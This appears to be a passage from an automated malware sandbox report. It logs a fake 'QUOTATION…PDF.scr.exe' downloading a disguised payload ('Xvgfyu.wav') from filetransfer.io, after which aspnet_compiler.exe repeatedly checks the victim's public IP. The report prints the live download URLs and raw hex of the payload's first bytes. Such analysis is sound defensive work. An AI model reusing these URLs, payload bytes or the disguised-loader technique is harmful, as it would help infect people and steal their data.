                                                              Nov 20, 2024 08:18:12.431993008 CET1.1.1.1192.168.2.40xff6cNo error (0)s24.filetransfer.io188.114.96.3A (IP address)IN (0x0001)false
                                                              Nov 20, 2024 08:18:59.780251980 CET1.1.1.1192.168.2.40xc59cNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                              Nov 20, 2024 08:18:59.780251980 CET1.1.1.1192.168.2.40xc59cNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                              Nov 20, 2024 08:18:59.780251980 CET1.1.1.1192.168.2.40xc59cNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                              Nov 20, 2024 08:18:59.780251980 CET1.1.1.1192.168.2.40xc59cNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                              Nov 20, 2024 08:18:59.780251980 CET1.1.1.1192.168.2.40xc59cNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                              Nov 20, 2024 08:18:59.780251980 CET1.1.1.1192.168.2.40xc59cNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                              Nov 20, 2024 08:19:00.781559944 CET1.1.1.1192.168.2.40x1e2bNo error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                                              Nov 20, 2024 08:19:00.781559944 CET1.1.1.1192.168.2.40x1e2bNo error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false

                                                              HTTP Request Dependency Graph

                                                              • filetransfer.io
                                                              • s24.filetransfer.io
                                                              • reallyfreegeoip.org
                                                              • checkip.dyndns.org

                                                              HTTP Packets

                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              0192.168.2.449730188.114.96.3807268C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe
                                                              TimestampBytes transferredDirectionData
                                                              Nov 20, 2024 08:18:10.185219049 CET95OUTGET /data-package/I7fmQg9d/download HTTP/1.1
                                                              Host: filetransfer.io
                                                              Connection: Keep-Alive
                                                              Nov 20, 2024 08:18:10.839596987 CET998INHTTP/1.1 301 Moved Permanently
                                                              Date: Wed, 20 Nov 2024 07:18:10 GMT
                                                              Content-Type: text/html
                                                              Transfer-Encoding: chunked
                                                              Connection: keep-alive
                                                              Location: https://filetransfer.io/data-package/I7fmQg9d/download
                                                              CF-Cache-Status: DYNAMIC
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UGfzAKFeo8wGscCGgwjzxpokaZFnEhE3uqidqypbltJTkE7BaEii2GudxFsYkTEYK2Itr7mAsibXV%2FbiG5LeKAt%2FvclEviNubtNPqCL3Zc%2BZO8BYtAWN%2FEEINGM6yvy%2FNnQ%3D"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 8e56aa1c3c5f80dc-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=8842&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=95&delivery_rate=0&cwnd=142&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                              Data Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                              Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>0


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              1192.168.2.449739193.122.6.168807792C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe
                                                              TimestampBytes transferredDirectionData
                                                              Nov 20, 2024 08:18:59.797810078 CET151OUTGET / HTTP/1.1
                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                              Host: checkip.dyndns.org
                                                              Connection: Keep-Alive
                                                              Nov 20, 2024 08:19:00.443377018 CET320INHTTP/1.1 200 OK
                                                              Date: Wed, 20 Nov 2024 07:19:00 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 103
                                                              Connection: keep-alive
                                                              Cache-Control: no-cache
                                                              Pragma: no-cache
                                                              X-Request-ID: f2a4640bd76c3de6a137eeda510d48b2
                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>
                                                              Nov 20, 2024 08:19:00.456357002 CET127OUTGET / HTTP/1.1
                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                              Host: checkip.dyndns.org
                                                              Nov 20, 2024 08:19:00.646150112 CET320INHTTP/1.1 200 OK
                                                              Date: Wed, 20 Nov 2024 07:19:00 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 103
                                                              Connection: keep-alive
                                                              Cache-Control: no-cache
                                                              Pragma: no-cache
                                                              X-Request-ID: 0790ca9d8795d6c4eff428b8158605fb
                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>
                                                              Nov 20, 2024 08:19:01.704252958 CET127OUTGET / HTTP/1.1
                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                              Host: checkip.dyndns.org
                                                              Nov 20, 2024 08:19:01.904439926 CET320INHTTP/1.1 200 OK
                                                              Date: Wed, 20 Nov 2024 07:19:01 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 103
                                                              Connection: keep-alive
                                                              Cache-Control: no-cache
                                                              Pragma: no-cache
                                                              X-Request-ID: fe82a35d308ac37653c6623156ccb04a
                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              2192.168.2.449742193.122.6.168807792C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe
                                                              TimestampBytes transferredDirectionData
                                                              Nov 20, 2024 08:19:02.556323051 CET127OUTGET / HTTP/1.1
                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                              Host: checkip.dyndns.org
                                                              Nov 20, 2024 08:19:03.202857971 CET320INHTTP/1.1 200 OK
                                                              Date: Wed, 20 Nov 2024 07:19:03 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 103
                                                              Connection: keep-alive
                                                              Cache-Control: no-cache
                                                              Pragma: no-cache
                                                              X-Request-ID: cd19518daa69a8a854c1f4f2cfcf3500
                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              3192.168.2.449745193.122.6.168807792C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe
                                                              TimestampBytes transferredDirectionData
                                                              Nov 20, 2024 08:19:03.937967062 CET127OUTGET / HTTP/1.1
                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                              Host: checkip.dyndns.org
                                                              Nov 20, 2024 08:19:04.584526062 CET320INHTTP/1.1 200 OK
                                                              Date: Wed, 20 Nov 2024 07:19:04 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 103
                                                              Connection: keep-alive
                                                              Cache-Control: no-cache
                                                              Pragma: no-cache
                                                              X-Request-ID: 2ec2266d5bc0b6df3f03c8590cc14e1d
                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              4192.168.2.449758193.122.6.168807792C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe
                                                              TimestampBytes transferredDirectionData
                                                              Nov 20, 2024 08:19:05.236510038 CET127OUTGET / HTTP/1.1
                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                              Host: checkip.dyndns.org
                                                              Nov 20, 2024 08:19:05.871831894 CET320INHTTP/1.1 200 OK
                                                              Date: Wed, 20 Nov 2024 07:19:05 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 103
                                                              Connection: keep-alive
                                                              Cache-Control: no-cache
                                                              Pragma: no-cache
                                                              X-Request-ID: a96b71f0018104dd21ccf3cefcfad079
                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              5192.168.2.449765193.122.6.168807792C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe
                                                              TimestampBytes transferredDirectionData
                                                              Nov 20, 2024 08:19:06.519090891 CET127OUTGET / HTTP/1.1
                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                              Host: checkip.dyndns.org
                                                              Nov 20, 2024 08:19:07.151909113 CET320INHTTP/1.1 200 OK
                                                              Date: Wed, 20 Nov 2024 07:19:07 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 103
                                                              Connection: keep-alive
                                                              Cache-Control: no-cache
                                                              Pragma: no-cache
                                                              X-Request-ID: 7a1783dee6aebf34890b443eae82d82a
                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              6192.168.2.449775193.122.6.168807792C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe
                                                              TimestampBytes transferredDirectionData
                                                              Nov 20, 2024 08:19:07.775638103 CET127OUTGET / HTTP/1.1
                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                              Host: checkip.dyndns.org
                                                              Nov 20, 2024 08:19:08.403659105 CET320INHTTP/1.1 200 OK
                                                              Date: Wed, 20 Nov 2024 07:19:08 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 103
                                                              Connection: keep-alive
                                                              Cache-Control: no-cache
                                                              Pragma: no-cache
                                                              X-Request-ID: d2262bbb91e37efde6208a581b6883f3
                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              7192.168.2.449781193.122.6.168807792C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe
                                                              TimestampBytes transferredDirectionData
                                                              Nov 20, 2024 08:19:09.244904995 CET127OUTGET / HTTP/1.1
                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                              Host: checkip.dyndns.org
                                                              Nov 20, 2024 08:19:09.870517015 CET320INHTTP/1.1 200 OK
                                                              Date: Wed, 20 Nov 2024 07:19:09 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 103
                                                              Connection: keep-alive
                                                              Cache-Control: no-cache
                                                              Pragma: no-cache
                                                              X-Request-ID: 8e36383cd441bc6b4d38b1266da10f1d
                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


                                                              HTTPS Proxied Packets

                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              0192.168.2.449731188.114.96.34437268C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-11-20 07:18:11 UTC95OUTGET /data-package/I7fmQg9d/download HTTP/1.1
                                                              Host: filetransfer.io
                                                              Connection: Keep-Alive
                                                              2024-11-20 07:18:12 UTC1252INHTTP/1.1 302 Found
                                                              Date: Wed, 20 Nov 2024 07:18:12 GMT
                                                              Content-Type: text/html; charset=utf-8
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              X-Powered-By: Nette Framework 3
                                                              X-Frame-Options: SAMEORIGIN
                                                              Set-Cookie: nette-samesite=1; path=/; SameSite=Strict; HttpOnly
                                                              Set-Cookie: PHPSESSID=5hpapqh1fj2lnms9vnsl9egh6v; expires=Wed, 04-Dec-2024 07:18:12 GMT; Max-Age=1209600; path=/; SameSite=Lax; secure; HttpOnly
                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                              Pragma: no-cache
                                                              Vary: X-Requested-With
                                                              Location: https://s24.filetransfer.io/storage/download/ndvzPJWaMUSB
                                                              CF-Cache-Status: DYNAMIC
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iR2IbzWvz3WWa7DhuA60UWCqoBbWGELq698bj%2FqeL3r70soZb2MnJvIulpqxxyfatdVaOvvBnjVhliKmEWYh1ovkBapsRYX1%2BpzWk%2BFSI%2B3bTBovx%2B3ntezgMSdT%2Bs%2By%2F8U%3D"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 8e56aa247b8f43e0-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1548&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2835&recv_bytes=709&delivery_rate=1800246&cwnd=247&unsent_bytes=0&cid=827973cbb87fdb1a&ts=1086&x=0"
                                                              2024-11-20 07:18:12 UTC117INData Raw: 38 30 0d 0a 3c 68 31 3e 52 65 64 69 72 65 63 74 3c 2f 68 31 3e 0a 0a 3c 70 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 32 34 2e 66 69 6c 65 74 72 61 6e 73 66 65 72 2e 69 6f 2f 73 74 6f 72 61 67 65 2f 64 6f 77 6e 6c 6f 61 64 2f 6e 64 76 7a 50 4a 57 61 4d 55 53 42 22 3e 50 6c 65 61 73 65 20 63 6c 69 63 6b 20 68 65 72 65 20 74 6f 20 63 6f
                                                              Data Ascii: 80<h1>Redirect</h1><p><a href="https://s24.filetransfer.io/storage/download/ndvzPJWaMUSB">Please click here to co
                                                              2024-11-20 07:18:12 UTC17INData Raw: 6e 74 69 6e 75 65 3c 2f 61 3e 2e 3c 2f 70 3e 0d 0a
                                                              Data Ascii: ntinue</a>.</p>
                                                              2024-11-20 07:18:12 UTC5INData Raw: 30 0d 0a 0d 0a
                                                              Data Ascii: 0


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              1192.168.2.449732188.114.97.34437268C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-11-20 07:18:12 UTC98OUTGET /storage/download/ndvzPJWaMUSB HTTP/1.1
                                                              Host: s24.filetransfer.io
                                                              Connection: Keep-Alive
                                                              2024-11-20 07:18:13 UTC1249INHTTP/1.1 200 OK
                                                              Date: Wed, 20 Nov 2024 07:18:13 GMT
                                                              Content-Type: application/octet-stream
                                                              Content-Length: 1069568
                                                              Connection: close
                                                              Last-Modified: Tue, 19 Nov 2024 08:33:30 GMT
                                                              Set-Cookie: nette-samesite=1; path=/; SameSite=Strict; HttpOnly
                                                              Set-Cookie: PHPSESSID=1c3165a00cbddebe89ea15c6473c7760; expires=Wed, 04-Dec-2024 07:18:13 GMT; Max-Age=1209600; path=/; SameSite=Lax; secure; HttpOnly
                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                              Content-Disposition: attachment; filename="Xvgfyu.wav"
                                                              Accept-Ranges: bytes
                                                              Accept-Ranges: bytes
                                                              ETag: "673c4d5a-105200"
                                                              CF-Cache-Status: DYNAMIC
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xs0i3yd6aR0%2BSLd35CW9hm7Own8AzAf1l%2B0JHoUPExspOxJ8tZON21Mket%2BkpVopEm27VetUfgviYq4zKbBd5AO4cTbHOsX2DN%2BZ55bwSS%2FTYGHpJ%2B8b6uw2mZtV2EQUfxkI%2BVDx"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 8e56aa2b2f12c44a-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1686&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2835&recv_bytes=712&delivery_rate=1615044&cwnd=223&unsent_bytes=0&cid=d577541a4244a320&ts=790&x=0"
                                                              2024-11-20 07:18:13 UTC120INData Raw: 7c 6e a1 31 37 31 31 34 35 31 34 31 ce cb 31 31 8c 31 31 34 31 31 34 31 71 34 31 31 34 31 31 34 31 31 34 31 31 34 31 31 34 31 31 34 31 31 34 31 31 34 31 31 34 31 31 34 31 31 34 31 b1 34 31 31 3a 2e 8b 3a 31 85 3d fc 10 8c 30 7d f9 10 65 5c 58 42 14 41 43 5b 56 43 55 5c 11 57 50 5f 5a 5e 45 14 53 54 14 43 44 5a 11 58 5a 11 75 7b 62 11 59 5e 55 51 1f 3c 39 3b
                                                              Data Ascii: |n171145141111141141q41141141141141141141141141141141141411:.:1=0}e\XBAC[VCU\WP_Z^ESTCDZXZu{bY^UQ<9;
                                                              2024-11-20 07:18:13 UTC1369INData Raw: 15 34 31 31 34 31 31 34 61 74 34 31 7d 35 32 31 a8 c6 f6 cb 31 31 34 31 31 34 31 31 d4 31 3f 15 3a 30 04 31 31 7e 21 31 34 37 31 34 31 31 34 31 9f 5d 21 31 34 11 31 34 31 b1 24 31 31 34 71 31 34 11 31 34 31 33 34 31 35 34 31 31 34 31 31 34 35 31 34 31 31 34 31 31 34 f1 21 34 31 33 34 31 31 34 31 31 37 31 71 b1 31 31 24 31 31 24 31 31 34 31 21 34 31 21 34 31 31 34 31 31 3b 31 31 34 31 31 34 31 31 34 31 31 54 58 21 34 7a 31 34 31 31 b4 21 31 10 32 31 34 31 31 34 31 31 34 31 31 34 31 31 34 31 31 34 31 31 94 21 31 38 31 31 34 31 31 34 31 31 34 31 31 34 31 31 34 31 31 34 31 31 34 31 31 34 31 31 34 31 31 34 31 31 34 31 31 34 31 31 34 31 31 34 31 31 34 31 31 34 31 31 34 31 11 34 31 39 34 31 31 34 31 31 34 31 31 34 31 39 14 31 31 7c 31 31 34 31 31 34 31 31 34 31
                                                              Data Ascii: 4114114at41}521114114111?:011~!147141141]!14141$114q1414134154114114514114114!41341141171q11$11$1141!41!411411;11411411411TX!4z1411!121411411411411411411!18114114114114114114114114114114114114114114114114114141941141141141911|1141141141
                                                              2024-11-20 07:18:13 UTC1369INData Raw: 34 26 1b 75 2d 31 34 31 31 34 31 54 34 31 31 b6 30 31 34 d6 30 34 31 08 34 31 31 23 31 31 35 22 01 30 31 35 34 31 31 34 31 31 34 31 31 23 1b 22 04 32 31 30 31 31 34 31 31 34 31 31 34 31 1b 27 01 32 34 35 31 34 31 31 34 31 31 34 31 31 1e 22 01 37 31 b1 34 31 31 35 31 31 25 19 fa 36 31 37 14 33 31 34 31 cf 3a 31 31 0c 31 31 34 31 cf 38 31 31 71 32 31 34 31 1f 34 31 31 1b 31 31 34 34 31 34 31 09 1d 31 31 34 4f b0 36 31 35 1c b6 36 34 37 11 35 31 31 34 4f 57 36 31 35 4f 27 33 34 35 0b f8 ce ce cb 17 11 35 31 31 34 09 f0 cb ce ce 1e 4f b3 36 31 35 1c ba 36 34 37 11 34 31 31 34 4f 57 36 31 35 4f 56 33 34 35 0b 96 ce ce cb 17 11 34 31 31 34 09 a6 cb ce ce 26 31 31 23 1b 31 34 31 23 34 31 25 1e 31 31 34 22 01 37 31 b1 34 31 31 35 31 31 25 19 fa 36 31 37 14 33 31
                                                              Data Ascii: 4&u-141141T411014041411#115"015411411411#"2101141141141'2451411411411"71411511%6173141:111141811q21414111144141114O6156475114OW615O'3455114O6156474114OW615OV3454114&11#141#41%114"71411511%61731
                                                              2024-11-20 07:18:13 UTC1369INData Raw: 31 37 4a b3 33 34 35 19 bf 36 31 32 1b 31 5e 19 fa 36 31 37 4a b0 33 34 35 19 b3 36 31 32 4f b3 36 31 35 1c ba 36 34 37 1b 34 5b 19 ff 33 31 32 4f b0 36 31 35 1c b6 36 34 37 4f b6 33 31 30 19 ba 33 31 37 1e 31 5b 1c fa 33 34 37 4f b5 33 31 30 19 b6 33 31 37 4a b3 33 34 35 19 bf 36 31 32 1b 31 5e 19 fa 36 31 37 4a b0 33 34 35 19 b3 36 31 32 4f b3 36 31 35 1c ba 36 34 37 1b 34 5b 19 ff 33 31 32 4f b0 36 31 35 1c b6 36 34 37 4f b6 33 31 30 19 ba 33 31 37 1e 31 5b 1c fa 33 34 37 4f b5 33 31 30 19 b6 33 31 37 4a b3 33 34 35 19 bf 36 31 32 1b 31 5e 19 fa 36 31 37 4a b0 33 34 35 19 b3 36 31 32 4f b3 36 31 35 1c ba 36 34 37 1b 34 5b 19 ff 33 31 32 4f b0 36 31 35 1c b6 36 34 37 4f b6 33 31 30 19 ba 33 31 37 1e 31 5b 1c fa 33 34 37 4f b5 33 31 30 19 b6 33 31 37 4a
                                                              Data Ascii: 17J3456121^617J345612O6156474[312O615647O3103171[347O310317J3456121^617J345612O6156474[312O615647O3103171[347O310317J3456121^617J345612O6156474[312O615647O3103171[347O310317J
                                                              2024-11-20 07:18:13 UTC1369INData Raw: 31 34 31 31 1e 22 01 30 31 35 34 31 31 34 31 31 34 31 31 20 1b 22 04 32 31 30 31 31 34 31 31 34 31 31 34 25 1b 27 01 32 34 35 31 34 31 31 34 31 31 34 31 31 1e 22 01 31 31 35 34 31 31 34 31 31 34 31 31 20 1b 22 04 32 31 b4 31 31 34 30 31 34 20 19 ff 33 31 32 11 30 34 31 31 ca 3f 31 34 09 31 34 31 31 ca 3d 31 34 74 32 34 31 31 1a 31 31 34 34 31 34 31 66 34 31 31 0c 18 31 34 31 4f b5 33 31 30 19 b6 33 31 37 14 31 31 34 31 4f 52 33 31 30 4a 4d 36 31 35 0d fd ce cb ce 17 14 31 31 34 31 09 f5 ce ce cb 4f b3 36 31 35 1c ba 36 34 37 11 34 31 31 34 4f 57 36 31 35 4f 19 33 34 35 0b 97 ce ce cb 17 11 36 31 31 34 09 a9 cb ce ce 1e 23 31 34 26 1b 34 31 31 26 31 31 20 1b 31 34 31 23 34 31 25 1e 31 31 34 22 01 37 31 35 34 31 31 34 31 31 34 31 31 34 1b 23 34 31 25 1e 31
                                                              Data Ascii: 1411"015411411411 "210114114114%'2451411411411"115411411411 "21114014 3120411?141411=14t24111144141f411141O3103171141OR310JM6151141O6156474114OW615O3456114#14&411&11 141#41%114"7154114114114#41%1
                                                              2024-11-20 07:18:13 UTC1369INData Raw: 26 31 31 20 1b 31 34 31 22 04 32 31 30 31 31 34 31 31 34 31 31 34 31 1b 26 31 31 20 1b 31 34 31 22 04 32 31 30 31 31 34 31 31 34 31 31 34 31 1b 26 31 31 20 1b 31 34 31 22 04 32 31 30 31 31 34 31 31 34 31 31 34 31 1b 26 31 31 20 1b 31 34 31 22 04 32 31 30 31 31 34 31 31 34 31 31 34 31 1b 27 01 32 34 35 31 34 31 31 34 31 31 34 31 31 1e 22 01 37 31 b1 34 31 31 35 31 31 25 19 fa 36 31 37 14 33 31 34 31 cf 3a 31 31 0c 31 31 34 31 cf 38 31 31 71 32 31 34 31 66 34 31 31 1a 31 31 34 34 31 34 31 09 66 31 31 34 4f b0 36 31 35 1c b6 36 34 37 11 35 31 31 34 4f 57 36 31 35 4f 5a 33 34 35 08 f8 ce ce cb 17 11 34 31 31 34 09 f0 cb ce ce 4a b3 33 34 35 19 bf 36 31 32 11 31 34 31 31 4a 57 33 34 35 4a 6c 33 31 30 0b 92 cb ce ce 12 11 31 34 31 31 0c a9 ce cb ce 1b 26 31 31
                                                              Data Ascii: &11 141"2101141141141&11 141"2101141141141&11 141"2101141141141&11 141"2101141141141'2451411411411"71411511%6173141:111141811q2141f4111144141f114O6156475114OW615OZ3454114J3456121411JW345Jl3101411&11
